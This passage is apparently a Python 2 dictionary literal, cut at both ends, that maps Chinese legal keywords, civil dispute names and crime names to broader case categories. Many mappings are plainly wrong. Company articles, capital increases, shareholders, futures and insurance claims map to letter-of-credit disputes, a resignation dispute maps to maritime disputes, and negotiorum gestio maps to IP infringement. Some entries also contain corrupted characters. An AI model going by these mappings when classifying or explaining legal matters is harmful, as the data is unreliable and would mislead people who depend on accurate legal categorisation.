u'证券纠纷',\r\n u'取水权': u'用益物权纠纷',\r\n u'寻衅滋事罪': u'妨害社会管理秩序罪',\r\n u'小额借款合同纠纷': u'合同纠纷',\r\n u'申请船舶优先权催告': u'海事诉讼特别程序案件',\r\n u'海上通海水域拖航合同纠纷': u'海事海商纠纷',\r\n u'异议登记': u'不动产登记纠纷',\r\n u'代位继承纠纷': u'继承纠纷',\r\n u'网络侵权责任纠纷': u'侵权责任纠纷',\r\n u'商品房委托代理': u'合同纠纷',\r\n u'介绍贿赂罪': u'贪污贿赂罪',\r\n u'盗伐林木罪': u'妨害社会管理秩序罪',\r\n u'财产保险合同纠纷': u'保险纠纷',\r\n u'技术秘密让与': u'知识产权合同纠纷',\r\n u'民间委托理财合同纠纷': u'合同纠纷',\r\n u'侵害患者知情同意权责任纠纷': u'侵权责任纠纷',\r\n u'保险人代位': u'保险纠纷',\r\n u'车位纠纷': u'所有权纠纷',\r\n u'案外人': u'执行异议之诉',\r\n u'损害股东利益': u'与公司有关的纠纷',\r\n u'破坏选举罪': u'侵犯公民人身权利、民主权利罪',\r\n u'公房': u'所有权纠纷',\r\n u'公司债券回购合同纠纷': u'证券纠纷',\r\n u'企业分立合同纠纷': u'与企业有关的纠纷',\r\n u'公司章程': u'信用证纠纷',\r\n u'预售': u'合同纠纷',\r\n u'集成电路布图设计专有权权属纠纷': u'知识产权权属侵权纠纷',\r\n u'增资': u'信用证纠纷',\r\n u'财产保险': u'信用证纠纷',\r\n u'加工合同纠纷': u'合同纠纷',\r\n u'签订、履行合同失职被骗罪': u'破坏社会主义市场经济秩序罪',\r\n u'诬告陷害罪': u'侵犯公民人身权利、民主权利罪',\r\n u'转质权纠纷': u'担保物权纠纷',\r\n u'国债回购合同纠纷': u'证券纠纷',\r\n u'组织越狱罪': u'妨害社会管理秩序罪',\r\n u'漂流物返还纠纷': u'所有权纠纷',\r\n u'证券认购': u'证券纠纷',\r\n u'期货保证合约': u'期货交易纠纷',\r\n u'专利代理合同': u'知识产权合同纠纷',\r\n u'婚姻自主权纠纷': u'人格权纠纷',\r\n u'申请宣告公民恢复完全民事行为能力': u'认定公民无民事行为能力、限制民事行为能力案件',\r\n u'生命': u'人格权纠纷',\r\n u'抵押合同': u'合同纠纷',\r\n u'船舶物料和备品供应合同纠纷': u'海事海商纠纷',\r\n u'申请海事支付令': u'海事诉讼特别程序案件',\r\n u'认定财产': u'认定财产无主案件',\r\n u'网络域名权属侵权纠纷': u'知识产权权属侵权纠纷',\r\n u'组织残疾人、儿童乞讨罪': u'侵犯公民人身权利、民主权利罪',\r\n u'商标使用许可合同纠纷': u'知识产权合同纠纷',\r\n u'船舶属具租赁合同纠纷': u'海事海商纠纷',\r\n u'保险经纪合同纠纷': u'保险纠纷',\r\n u'中外合作经营企业合同纠纷': u'与企业有关的纠纷',\r\n u'提供侵入、非法控制计算机信息系统程序、工具罪': u'妨害社会管理秩序罪',\r\n u'申请认可和执行澳门特别行政区法院民事判决': u'申请承认与执行法院判决、仲裁裁决案件',\r\n u'海上通海水域行李运输合同纠纷': u'海事海商纠纷',\r\n u'共有人': u'所有权纠纷',\r\n u'中外合资': u'与企业有关的纠纷',\r\n u'侵害作品复制权纠纷': u'知识产权权属侵权纠纷',\r\n u'辞职争议': u'海事海商纠纷',\r\n u'技术合同纠纷': u'知识产权合同纠纷',\r\n u'煽动颠覆国家政权罪': u'危害国家安全罪',\r\n u'债权人撤销权纠纷': u'合同纠纷',\r\n u'代为': u'信用证纠纷',\r\n u'国债': u'信用证纠纷',\r\n u'软件': u'知识产权权属侵权纠纷',\r\n u'计算机软件著作权权属纠纷': u'知识产权权属侵权纠纷',\r\n u'土地承包经营权出租合同纠纷': u'合同纠纷',\r\n u'招投标': u'合同纠纷',\r\n u'经营秘密': u'知识产权权属侵权纠纷',\r\n u'铁路运输': u'侵权责任纠纷',\r\n u'集体合同纠纷': u'劳动争议',\r\n u'虐待罪': u'侵犯公民人身权利、民主权利罪',\r\n u'承揽合同': u'合同纠纷',\r\n u'承包地': u'用益物权纠纷',\r\n u'擅自改变武器装备编配用途罪': u'军人违反职责罪',\r\n u'医疗损害': u'侵权责任纠纷',\r\n u'海运集装箱租赁合同纠纷': u'海事海商纠纷',\r\n u'典当纠纷': u'合同纠纷',\r\n u'试用买卖': u'合同纠纷',\r\n u'再保险合同纠纷': u'保险纠纷',\r\n u'网络服务': u'合同纠纷',\r\n u'盗窃、侮辱、故意毁坏尸体、尸骨、骨灰罪': u'妨害社会管理秩序罪',\r\n u'证券认购纠纷': u'证券纠纷',\r\n u'走私废物罪': u'破坏社会主义市场经济秩序罪',\r\n u'证券投资基金回购合同纠纷': u'证券纠纷',\r\n u'电信': u'合同纠纷',\r\n u'妨害公务罪': u'妨害社会管理秩序罪',\r\n u'船舶改建合同纠纷': u'海事海商纠纷',\r\n u'捆绑': u'垄断纠纷',\r\n u'船舶租用合同纠纷': u'海事海商纠纷',\r\n u'工伤保险': u'劳动争议',\r\n u'植物新品种育种合同纠纷': u'知识产权合同纠纷',\r\n u'串通投标罪': u'破坏社会主义市场经济秩序罪',\r\n u'期货交易代理合同纠纷': u'期货交易纠纷',\r\n u'委托合同纠纷': u'合同纠纷',\r\n u'串通投标不正当竞争纠纷': u'不正当竞争纠纷',\r\n u'养老': u'劳动争议',\r\n u'运杂费': u'合同纠纷',\r\n u'辞退争议': u'人事争��',\r\n u'进出口代理合同纠纷': u'合同纠纷',\r\n u'医疗保险': u'劳动争议',\r\n u'申请海事强制令': u'海事诉讼特别程序案件',\r\n u'商检徇私舞弊罪': u'渎职罪',\r\n u'申请宣告公民限制民事行为能力': u'认定公民无民事行为能力、限制民事行为能力案件',\r\n u'建筑物区分所有权纠纷': u'所有权纠纷',\r\n u'遗嘱继承纠纷': u'继承纠纷',\r\n u'医疗产品责任纠纷': u'侵权责任纠纷',\r\n u'船舶属具': u'海事海商纠纷',\r\n u'计算机软件': u'知识产权权属侵权纠纷',\r\n u'发明创造': u'知识产权权属侵权纠纷',\r\n u'著作权合同': u'知识产权合同纠纷',\r\n u'教育培训合同纠纷': u'合同纠纷',\r\n u'走私珍贵动物、珍贵动物制品罪': u'破坏社会主义市场经济秩序罪',\r\n u'隐藏物': u'所有权纠纷',\r\n u'假冒专利罪': u'破坏社会主义市场经济秩序罪',\r\n u'非法购买增值税专用发票、购买伪造的增值税专用发票罪': u'破坏社会主义市场经济秩序罪',\r\n u'应收账款质权纠纷': u'担保物权纠纷',\r\n u'临时用地合同纠纷': u'合同纠纷',\r\n u'确认合同无效纠纷': u'合同纠纷',\r\n u'国际铁路': u'合同纠纷',\r\n u'虚假登记': u'不动产登记纠纷',\r\n u'联合运输合同纠纷': u'合同纠纷',\r\n u'专利权转让': u'知识产权合同纠纷',\r\n u'招标投标买卖合同纠纷': u'合同纠纷',\r\n u'证券回购': u'证券纠纷',\r\n u'发现权': u'知识产权权属侵权纠纷',\r\n u'申请公示催告': u'公示催告程序案件',\r\n u'非法买卖、运输、携带、持有毒品原植物种子、幼苗罪': u'妨害社会管理秩序罪',\r\n u'国债权利确认纠纷': u'证券纠纷',\r\n u'非法收购、运输盗伐、滥伐的林木罪': u'妨害社会管理秩序罪',\r\n u'非法采伐、毁坏国家重点保护植物罪': u'妨害社会管理秩序罪',\r\n u'海上通海水域财产损害责任纠纷': u'海事海商纠纷',\r\n u'意外伤害保险合同纠纷': u'保险纠纷',\r\n u'转继承纠纷': u'继承纠纷',\r\n u'侵害外观设计专利权纠纷': u'知识产权权属侵权纠纷',\r\n u'侵害实用新型专利权纠纷': u'知识产权权属侵权纠纷',\r\n u'承销': u'证券纠纷',\r\n u'分期付款买卖合同纠纷': u'合同纠纷',\r\n u'逃避商检罪': u'破坏社会主义市场经济秩序罪',\r\n u'物业服务合同纠纷': u'合同纠纷',\r\n u'民事信托纠纷': u'信托纠纷',\r\n u'申请执行涉外仲裁裁决': u'申请承认与执行法院判决、仲裁裁决案件',\r\n u'管理人': u'信用证纠纷',\r\n u'股东': u'信用证纠纷',\r\n u'组织淫秽表演罪': u'妨害社会管理秩序罪',\r\n u'商标': u'知识产权合同纠纷',\r\n u'侵害作品信息网络传播权纠纷': u'知识产权权属侵权纠纷',\r\n u'房屋买卖合同纠纷': u'合同纠纷',\r\n u'票据回购纠纷': u'票据纠纷',\r\n u'侵占期货交易保证金纠纷': u'期货交易纠纷',\r\n u'保险人代位求偿权纠纷': u'保险纠纷',\r\n u'证券回购合同纠纷': u'证券纠纷',\r\n u'探矿权转让合同纠纷': u'合同纠纷',\r\n u'劫夺被押解人员罪': u'妨害社会管理秩序罪',\r\n u'发明专利实施': u'知识产权合同纠纷',\r\n u'遗弃伤病军人罪': u'军人违反职责罪',\r\n u'提供伪造、变造的出入境证件罪': u'妨害社会管理秩序罪',\r\n u'网络域名注册合同纠纷': u'知识产权合同纠纷',\r\n u'商业秘密': u'不正当竞争纠纷',\r\n u'种植养殖回收合同纠纷': u'合同纠纷',\r\n u'租金': u'合同纠纷',\r\n u'资本': u'与公司有关的纠纷',\r\n u'强迫卖淫罪': u'妨害社会管理秩序罪',\r\n u'专利申请权权属纠纷': u'知识产权权属侵权纠纷',\r\n u'抵押权': u'担保物权纠纷',\r\n u'福利待遇': u'劳动争议',\r\n u'过失致人重伤罪': u'侵犯公民人身权利、民主权利罪',\r\n u'其他著作财产权': u'知识产权权属侵权纠纷',\r\n u'广播组织权权属纠纷': u'知识产权权属侵权纠纷',\r\n u'船舶碰撞损害责任纠纷': u'海事海商纠纷',\r\n u'建筑设备租赁合同纠纷': u'合同纠纷',\r\n u'申请破产和解': u'与破产有关的纠纷',\r\n u'最高额质权纠纷': u'担保物权纠纷',\r\n u'企业承包': u'与企业有关的纠纷',\r\n u'储蓄': u'合同纠纷',\r\n u'环保': u'侵权责任纠纷',\r\n u'滥用职权罪': u'渎职罪',\r\n u'探矿权': u'用益物权纠纷',\r\n u'劫持航空器罪': u'危害公共安全罪',\r\n u'组织、领导、参加黑社会性质组织罪': u'妨害社会管理秩序罪',\r\n u'违法提供出口退税凭证罪': u'渎职罪',\r\n u'定金合同纠纷': u'合同纠纷',\r\n u'捆绑交易纠纷': u'垄断纠纷',\r\n u'申���撤销宣告公民死亡': u'宣告失踪、宣告死亡案件',\r\n u'证券权利确认纠纷': u'证券纠纷',\r\n u'植物新品种权权属侵权纠纷': u'知识产权权属侵权纠纷',\r\n u'决议': u'信用证纠纷',\r\n u'生产、销售伪劣农药、兽药、化肥、种子罪': u'破坏社会主义市场经济秩序罪',\r\n u'集成电路': u'知识产权权属侵权纠纷',\r\n u'金融工作人员购买假币、以假币换取货币罪': u'破坏社会主义市场经济秩序罪',\r\n u'房屋租赁合同纠纷': u'合同纠纷',\r\n u'非法出售、私赠文物藏品罪': u'妨害社会管理秩序罪',\r\n u'人寿保险': u'保险纠纷',\r\n u'保全损害': u'侵权责任纠纷',\r\n u'期货透支': u'期货交易纠纷',\r\n u'委托开立': u'信用证纠纷',\r\n u'股权质权纠纷': u'担保物权纠纷',\r\n u'借记卡': u'合同纠纷',\r\n u'探矿权纠纷': u'用益物权纠纷',\r\n u'申请扣押船用燃油及船用物料': u'海事诉讼特别程序案件',\r\n u'污染': u'侵权责任纠纷',\r\n u'非法搜查罪': u'侵犯公民人身权利、民主权利罪',\r\n u'网络购物': u'合同纠纷',\r\n u'农村房屋买卖': u'合同纠纷',\r\n u'采矿权纠纷': u'用益物权纠纷',\r\n u'渔船承包合同纠纷': u'海事海商纠纷',\r\n u'债权让与': u'合同纠纷',\r\n u'因申请诉前证据保全损害责任纠纷': u'侵权责任纠纷',\r\n u'逃避追缴欠税罪': u'破坏社会主义市场经济秩序罪',\r\n u'金融衍生品': u'信用证纠纷',\r\n u'理货合同纠纷': u'海事海商纠纷',\r\n u'股东出资纠纷': u'与公司有关的纠纷',\r\n u'因恶意提起知识产权诉讼损害责任纠纷': u'知识产权权属侵权纠纷',\r\n u'金融借款合同纠纷': u'合同纠纷',\r\n u'证券发行': u'证券纠纷',\r\n u'公司债券交易纠纷': u'证券纠纷',\r\n u'庆典服务合同纠纷': u'合同纠纷',\r\n u'植物新品种申请权权属纠纷': u'知识产权权属侵权纠纷',\r\n u'相邻': u'所有权纠纷',\r\n u'执行判决、裁定失职罪': u'渎职罪',\r\n u'战时拒不救治伤病军人罪': u'军人违反职责罪',\r\n u'公司证照': u'与公司有关的纠纷',\r\n u'入境发展黑社会组织罪': u'妨害社会管理秩序罪',\r\n u'证券交易': u'证券纠纷',\r\n u'帮助恐怖活动罪': u'危害公共安全罪',\r\n u'道路': u'侵权责任纠纷',\r\n u'接送不合格兵员罪': u'危害国防利益罪',\r\n u'承包地征收补偿费用分配纠纷': u'用益物权纠纷',\r\n u'敲诈勒索罪': u'侵犯财产罪',\r\n u'发明权纠纷': u'知识产权权属侵权纠纷',\r\n u'伪造货币罪': u'破坏社会主义市场经济秩序罪',\r\n u'铁路机车车辆建造合同纠纷': u'合同纠纷',\r\n u'宅基地': u'用益物权纠纷',\r\n u'实用新型专利': u'知识产权权属侵权纠纷',\r\n u'侵犯著作权罪': u'破坏社会主义市场经济秩序罪',\r\n u'非法处置查封、扣押、冻结的财产罪': u'妨害社会管理秩序罪',\r\n u'商品房销售合同纠纷': u'合同纠纷',\r\n u'请求公司收购股份纠纷': u'与公司有关的纠纷',\r\n u'审查': u'行政管理与行政行为',\r\n u'妨害信用卡管理罪': u'破坏社会主义市场经济秩序罪',\r\n u'公司增资纠纷': u'与公司有关的纠纷',\r\n u'相邻损害防免关系纠纷': u'所有权纠纷',\r\n u'对外国公职人员、国际公共组织官员行贿罪': u'破坏社会主义市场经济秩序罪',\r\n u'教育设施重大安全事故罪': u'危害公共安全罪',\r\n u'票据交付请求权纠纷': u'票据纠纷',\r\n u'公司决议撤销纠纷': u'与公司有关的纠纷',\r\n u'计算机软件著作权许可使用合同纠纷': u'知识产权合同纠纷',\r\n u'编造、故意传播虚假信息罪': u'妨害社会管理秩序罪',\r\n u'借用合同纠纷': u'合同纠纷',\r\n u'船舶代理': u'海事海商纠纷',\r\n u'非法持有、私藏枪支、弹药罪': u'危害公共安全罪',\r\n u'战时拒绝、逃避服役罪': u'危害国防利益罪',\r\n u'猥亵儿童罪': u'侵犯公民人身权利、民主权利罪',\r\n u'水路': u'合同纠纷',\r\n u'债权人撤销': u'合同纠纷',\r\n u'股份': u'信用证纠纷',\r\n u'业主': u'所有权纠纷',\r\n u'过失爆炸罪': u'危害公共安全罪',\r\n u'泄露不应公开的案件信息罪': u'妨害社会管理秩序罪',\r\n u'同居关系子女抚养纠纷': u'婚姻家庭纠纷',\r\n u'伪造、变造国家有价证券罪': u'破坏社会主义市场经济秩序罪',\r\n u'人身保险': u'保险纠纷',\r\n u'同居关系纠纷': u'婚姻家庭纠纷',\r\n u'期货交易代理': u'期货交易纠纷',\r\n u'申请执行海事仲裁裁决': u'申请承认与执行法院判决、仲裁裁决案件',\r\n u'委托创作': u'知识产权合同纠纷',\r\n u'营业信托纠纷': u'信托纠纷',\r\n u'对单位行贿罪': u'贪污贿赂罪',\r\n u'知识产权质押': u'知识产权合同纠纷',\r\n u'骗购外汇罪': u'破坏社会主义市场经济秩序罪',\r\n u'婚姻无效纠纷': u'婚姻家庭纠纷',\r\n u'港口货物保管合同纠纷': u'海事海商纠纷',\r\n u'投诉': u'行政管理与行政行为',\r\n u'产品质量侵权': u'侵权责任纠纷',\r\n u'遗嘱继承': u'继承纠纷',\r\n u'过失损毁文物罪': u'妨害社会管理秩序罪',\r\n u'证券交易代理合同纠纷': u'证券纠纷',\r\n u'福利待遇纠纷': u'劳动争议',\r\n u'受贿罪': u'贪污贿赂罪',\r\n u'埋藏物': u'所有权纠纷',\r\n u'内幕交易、泄露内幕信息罪': u'破坏社会主义市场经济秩序罪',\r\n u'保险理赔': u'信用证纠纷',\r\n u'战时窝藏逃离部队军人罪': u'危害国防利益罪',\r\n u'广播电视播放合同纠纷': u'知识产权合同纠纷',\r\n u'装饰': u'合同纠纷',\r\n u'渔业承包': u'合同纠纷',\r\n u'确认合同有效纠纷': u'合同纠纷',\r\n u'铁路运营安全事故罪': u'危害公共安全罪',\r\n u'所有权确认': u'物权保护纠纷',\r\n u'侵害出版者权纠纷': u'知识产权权属侵权纠纷',\r\n u'测试': u'合同纠纷',\r\n u'项目转让合同纠纷': u'合同纠纷',\r\n u'侵害其他著作财产权纠纷': u'知识产权权属侵权纠纷',\r\n u'海上通海水域货运代理合同纠纷': u'海事海商纠纷',\r\n u'技术秘密': u'知识产权权属侵权纠纷',\r\n u'拒绝': u'垄断纠纷',\r\n u'公司设立': u'与公司有关的纠纷',\r\n u'代理合同': u'合同纠纷',\r\n u'侵害发明专利权纠纷': u'知识产权权属侵权纠纷',\r\n u'过失损坏广播电视设施、公用电信设施罪': u'危害公共安全罪',\r\n u'医疗服务合同纠纷': u'合同纠纷',\r\n u'融资融券交易纠纷': u'证券纠纷',\r\n u'房地产价格评估合同纠纷': u'合同纠纷',\r\n u'债权债务概括': u'合同纠纷',\r\n u'申请撤销认定财产无主': u'认定财产无主案件',\r\n u'商标权': u'知识产权权属侵权纠纷',\r\n u'货物运输': u'合同纠纷',\r\n u'相邻关系': u'所有权纠纷',\r\n u'期货虚假信息责任纠纷': u'期货交易纠纷',\r\n u'见义勇为人受害责任纠纷': u'侵权责任纠纷',\r\n u'基金份额质权纠纷': u'担保物权纠纷',\r\n u'知名商品': u'不正当竞争纠纷',\r\n u'损害公司利益责任纠纷': u'与公司有关的纠纷',\r\n u'传授犯罪方法罪': u'妨害社会管理秩序罪',\r\n u'健康': u'人格权纠纷',\r\n u'伪造、倒卖伪造的有价票证罪': u'破坏社会主义市场经济秩序罪',\r\n u'光船租赁': u'海事海商纠纷',\r\n u'组织、资助非法聚集罪': u'妨害社会管理秩序罪',\r\n u'技术': u'知识产权权属侵权纠纷',\r\n u'技术培训合同纠纷': u'知识产权合同纠纷',\r\n u'加班工资': u'劳动争议',\r\n u'互易纠纷': u'合同纠纷',\r\n u'餐饮服务合同纠纷': u'合同纠纷',\r\n u'商品特有名称': u'知识产权权属侵权纠纷',\r\n u'担保物权确认': u'物权保护纠纷',\r\n u'最高额抵押权纠纷': u'担保物权纠纷',\r\n u'不当': u'合同纠纷',\r\n u'遗赠纠纷': u'继承纠纷',\r\n u'合作创作': u'知识产权合同纠纷',\r\n u'申请撤销仲裁裁决': u'仲裁程序案件',\r\n u'期货': u'信用证纠纷',\r\n u'招收公务员、学生徇私舞弊罪': u'渎职罪',\r\n u'骗取贷款、票据承兑、金融票证罪': u'破坏社会主义市场经济秩序罪',\r\n u'经营秘密让与合同纠纷': u'知识产权合同纠纷',\r\n u'走私国家禁止进出口的货物、物品罪': u'破坏社会主义市场经济秩序罪',\r\n u'证券代销合同纠纷': u'证券纠纷',\r\n u'申请撤销监护人资格': u'监护权特别程序案件',\r\n u'生育保险待遇纠纷': u'劳动争议',\r\n u'侵害保护作品完整权纠纷': u'知识产权权属侵权纠纷',\r\n u'相邻用水排水纠纷': u'所有权纠纷',\r\n u'物业': u'合同纠纷',\r\n u'编造、故意传播虚假恐怖信息罪': u'妨害社会管理秩序罪',\r\n u'票据诈骗罪': u'破坏社会主义市场经济秩序罪',\r\n u'海域使用权纠纷': u'用益物权纠纷',\r\n u'侵害': u'知识产权权属侵权纠纷',\r\n u'进出口信用保险合同纠纷': u'保险纠纷',\r\n u'养老保险待遇纠纷': u'劳动争议',\r\n u'金融不良债权追偿纠纷': u'合同纠纷',\r\n u'股票交易纠纷': u'证券纠纷',\r\n u'私自开拆、隐匿、毁弃邮件、电报罪': u'侵犯公民人身权利、民主权利罪',\r\n u'计算机域名': u'知识产权合同纠纷',\r\n u'消除危险纠纷': u'物权保护纠纷',\r\n u'假冒他人专利': u'知识产权权属侵权纠纷',\r\n u'退伙纠���': u'合伙企业纠纷',\r\n u'婚姻自主权': u'人格权纠纷',\r\n u'触电人身损害责任纠纷': u'侵权责任纠纷',\r\n u'理货': u'海事海商纠纷',\r\n u'遗失、抛弃高度危险物损害责任纠纷': u'侵权责任纠纷',\r\n u'确认不侵害': u'知识产权权属侵权纠纷',\r\n u'公司决议效力确认纠纷': u'与公司有关的纠纷',\r\n u'竞业': u'劳动争议',\r\n u'停止侵害': u'申请诉前停止侵害知识产权案件',\r\n u'机动车交通事故责任纠纷': u'侵权责任纠纷',\r\n u'债券回购': u'证券纠纷',\r\n u'著作权合同纠纷': u'知识产权合同纠纷',\r\n u'侮辱罪': u'侵犯公民人身权利、民主权利罪',\r\n u'公共场所': u'侵权责任纠纷',\r\n u'安全保障义务': u'侵权责任纠纷',\r\n u'虚假登记损害责任纠纷': u'不动产登记纠纷',\r\n u'营业信托': u'信托纠纷',\r\n u'航次租船合同纠纷': u'海事海商纠纷',\r\n u'集成电路布图设计合同纠纷': u'知识产权合同纠纷',\r\n u'买卖': u'合同纠纷',\r\n u'消除危险': u'物权保护纠纷',\r\n u'返还原物纠纷': u'物权保护纠纷',\r\n u'挪用资金罪': u'侵犯财产罪',\r\n u'投降罪': u'军人违反职责罪',\r\n u'假冒他人专利纠纷': u'知识产权权属侵权纠纷',\r\n u'码头建造': u'海事海商纠纷',\r\n u'业主共有权纠纷': u'所有权纠纷',\r\n u'商品房预约': u'合同纠纷',\r\n u'技术秘密许可使用合同纠纷': u'知识产权合同纠纷',\r\n u'义务帮工': u'侵权责任纠纷',\r\n u'人事': u'人事争议',\r\n u'信用证议付纠纷': u'信用证纠纷',\r\n u'发起人责任纠纷': u'与公司有关的纠纷',\r\n u'财会服务合同纠纷': u'合同纠纷',\r\n u'船舶抵押合同纠纷': u'海事海商纠纷',\r\n u'凭样品买卖': u'合同纠纷',\r\n u'非法制造、出售非法制造的用于骗取出口退税、抵扣税款发票罪': u'破坏社会主义市场经济秩序罪',\r\n u'战时自伤罪': u'军人违反职责罪',\r\n u'其他科技成果权纠纷': u'知识产权权属侵权纠纷',\r\n u'差别待遇': u'垄断纠纷',\r\n u'债权转让': u'合同纠纷',\r\n u'经营者集中纠纷': u'垄断纠纷',\r\n u'经济补偿金': u'劳动争议',\r\n u'企业股份合作制改造合同纠纷': u'与企业有关的纠纷',\r\n u'非法猎捕、杀害珍贵、濒危野生动物罪': u'妨害社会管理秩序罪',\r\n u'服务合同纠纷': u'合同纠纷',\r\n u'股票回购': u'证券纠纷',\r\n u'特殊标志专有权': u'知识产权权属侵权纠纷',\r\n u'申请撤销宣告失踪': u'宣告失踪、宣告死亡案件',\r\n u'堆放物倒塌致害责任纠纷': u'侵权责任纠纷',\r\n u'办理偷越国(边)境人员出入境证件罪': u'渎职罪',\r\n u'在建船舶航空器抵押权纠纷': u'担保物权纠纷',\r\n u'破坏交通设施罪': u'危害公共安全罪',\r\n u'餐饮': u'合同纠纷',\r\n u'违法发放林木采伐许可证罪': u'渎职罪',\r\n u'无民事行为能力': u'认定公民无民事行为能力、限制民事行为能力案件',\r\n u'定期租船合同纠纷': u'海事海商纠纷',\r\n u'非法持有毒品罪': u'妨害社会管理秩序罪',\r\n u'窝藏、包庇罪': u'妨害社会管理秩序罪',\r\n u'破产撤销': u'与破产有关的纠纷',\r\n u'侵害作品修改权纠纷': u'知识产权权属侵权纠纷',\r\n u'合资合作开发房地产合同纠纷': u'合同纠纷',\r\n u'金融衍生品种交易纠纷': u'证券纠纷',\r\n u'铁路运输财产损害责任纠纷': u'侵权责任纠纷',\r\n u'仲裁程序中的证据保全': u'申请保全案件',\r\n u'船舶损坏': u'海事海商纠纷',\r\n u'发明创造发明人设计人署名权纠纷': u'知识产权权属侵权纠纷',\r\n u'船员劳务': u'海事海商纠纷',\r\n u'申请宣告公民失踪': u'宣告失踪、宣告死亡案件',\r\n u'缔约过失': u'合同纠纷',\r\n u'公司债权人': u'信用证纠纷',\r\n u'有线电视': u'合同纠纷',\r\n u'计算机软件著作权转让合同纠纷': u'知识产权合同纠纷',\r\n u'非法使用窃听、窃照专用器材罪': u'妨害社会管理秩序罪',\r\n u'环境污染': u'侵权责任纠纷',\r\n u'持有伪造的发票罪': u'破坏社会主义市场经济秩序罪',\r\n u'著作权': u'知识产权合同纠纷',\r\n u'聚众扰乱社会秩序罪': u'妨害社会管理秩序罪',\r\n u'土地承包经营权入股合同纠纷': u'合同纠纷',\r\n u'紧急避险': u'侵权责任纠纷',\r\n u'公路旅客运输': u'合同纠纷',\r\n u'技术成果完成人': u'知识产权合同纠纷',\r\n u'著作权权属侵权纠纷': u'知识产权权属侵权纠纷',\r\n u'指使部属违反职责罪': u'军人违反职责罪',\r\n u'国际货物买卖合同纠纷': u'合同纠纷',\r\n u'委托代建合同纠���': u'合同纠纷',\r\n u'电子废物污染责任纠纷': u'侵权责任纠纷',\r\n u'展览合同纠纷': u'合同纠纷',\r\n u'信用保险合同纠纷': u'保险纠纷',\r\n u'保管纠纷': u'合同纠纷',\r\n u'互易': u'合同纠纷',\r\n u'拆迁安置': u'合同纠纷',\r\n u'证券发行失败纠纷': u'证券纠纷',\r\n u'航道': u'海事海商纠纷',\r\n u'网络侵权': u'侵权责任纠纷',\r\n u'汇票回单': u'票据纠纷',\r\n u'进出口押汇纠纷': u'合同纠纷',\r\n u'申请承认和执行': u'申请承认与执行法院判决、仲裁裁决案件',\r\n u'海难': u'海事海商纠纷',\r\n u'铁路旅客运输合同纠纷': u'合同纠纷',\r\n u'集成电路布图设计许可': u'知识产权合同纠纷',\r\n u'抗税罪': u'破坏社会主义市场经济秩序罪',\r\n u'技术转让合同纠纷': u'知识产权合同纠纷',\r\n u'侵害计算机软件著作权': u'知识产权权属侵权纠纷',\r\n u'传播性病罪': u'妨害社会管理秩序罪',\r\n u'申请承认和执行外国仲裁裁决': u'申请承认与执行法院判决、仲裁裁决案件',\r\n u'无因管理纠纷': u'知识产权权属侵权纠纷',\r\n u'职务发明创造': u'知识产权权属侵权纠纷',\r\n u'生命健康身体': u'人格权纠纷',\r\n u'对非国家工作人员行贿罪': u'破坏社会主义市场经济秩序罪',\r\n u'出卖人取回权纠纷': u'与破产有关的纠纷',\r\n u'非法利用信息网络罪': u'妨害社会管理秩序罪',\r\n u'盗窃、抢夺、毁灭国家机关公文、证件、印章罪': u'妨害社会管理秩序罪',\r\n u'申请变更监护人': u'监护权特别程序案件',\r\n u'利用未公开信息交易罪': u'破坏社会主义市场经济秩序罪',\r\n u'养殖权': u'用益物权纠纷',\r\n u'定作合同纠纷': u'合同纠纷',\r\n u'奖券': u'合同纠纷',\r\n u'债券质权纠纷': u'担保物权纠纷',\r\n u'船坞码头建造合同纠纷': u'海事海商纠纷',\r\n u'开设赌场罪': u'妨害社会管理秩序罪',\r\n u'贷款合同': u'合同纠纷',\r\n u'林木折断损害责任纠纷': u'侵权责任纠纷',\r\n u'城市公交运输': u'合同纠纷',\r\n u'外观设计专利实施': u'知识产权合同纠纷',\r\n u'健康保险': u'保险纠纷',\r\n u'保险代理': u'保险纠纷',\r\n u'侵害集成电路布图设计专有权纠纷': u'知识产权权属侵权纠纷',\r\n u'相邻通行纠纷': u'所有权纠纷',\r\n u'为亲友非法牟利罪': u'破坏社会主义市场经济秩序罪',\r\n u'申请撤销宣告': u'宣告失踪、宣告死亡案件',\r\n u'故意杀人罪': u'侵犯公民人身权利、民主权利罪',\r\n u'船舶融资租赁': u'海事海商纠纷',\r\n u'组织考试作弊罪': u'妨害社会管理秩序罪',\r\n u'侵害作品摄制权纠纷': u'知识产权权属侵权纠纷',\r\n u'侵害作品汇编权纠纷': u'知识产权权属侵权纠纷',\r\n u'网络购物合同纠纷': u'合同纠纷',\r\n u'实用新型专利实施许可合同纠纷': u'知识产权合同纠纷',\r\n u'协助组织卖淫罪': u'妨害社会管理秩序罪',\r\n u'质权': u'担保物权纠纷',\r\n u'家政服务合同纠纷': u'合同纠纷',\r\n u'海事担保合同纠纷': u'海事海商纠纷',\r\n u'金融不良债权转让': u'合同纠纷',\r\n u'劳动关系': u'劳动争议',\r\n u'票据损害责任纠纷': u'票据纠纷',\r\n u'追收': u'信用证纠纷',\r\n u'技术咨询合同纠纷': u'知识产权合同纠纷',\r\n u'侵害作品放映权纠纷': u'知识产权权属侵权纠纷',\r\n u'因申请诉前停止侵害著作权损害责任纠纷': u'知识产权权属侵权纠纷',\r\n u'同居': u'婚姻家庭纠纷',\r\n u'用工': u'劳动争议',\r\n u'保险费': u'保险纠纷',\r\n u'盗版': u'知识产权权属侵权纠纷',\r\n u'殡葬服务': u'合同纠纷',\r\n u'故意提供不合格武器装备、军事设施罪': u'危害国防利益罪',\r\n u'经纪合同': u'期货交易纠纷',\r\n u'专利权权属纠纷': u'知识产权权属侵权纠纷',\r\n u'申请宣告': u'宣告失踪、宣告死亡案件',\r\n u'中外合作勘探开发自然资源合同纠纷': u'合同纠纷',\r\n u'劳动合同纠纷': u'劳动争议',\r\n u'确认劳动关系纠纷': u'劳动争议',\r\n u'股票权利确认纠纷': u'证券纠纷',\r\n u'盗窃、抢夺武器装备、军用物资罪': u'军人违反职责罪',\r\n u'期货欺诈责任纠纷': u'期货交易纠纷',\r\n u'虐待被监管人罪': u'侵犯公民人身权利、民主权利罪',\r\n u'虚假破产罪': u'破坏社会主义市场经济秩序罪',\r\n u'债权人': u'合同纠纷',\r\n u'拒不履行信息网络安全管理义务罪': u'妨害社会管理秩序罪',\r\n u'高度危险责任纠纷': u'侵权责任纠纷',\r\n u'解散': u'信用证纠纷',\r\n u'物件': u'侵权责任纠纷',\r\n u'租赁合同': u'合同纠纷',\r\n u'证券包销合同纠纷': u'证券纠纷',\r\n u'逃税罪': u'破坏社会主义市场经济秩序罪',\r\n u'经营秘密许可使用': u'知识产权合同纠纷',\r\n u'专利使用费': u'知识产权权属侵权纠纷',\r\n u'投敌叛变罪': 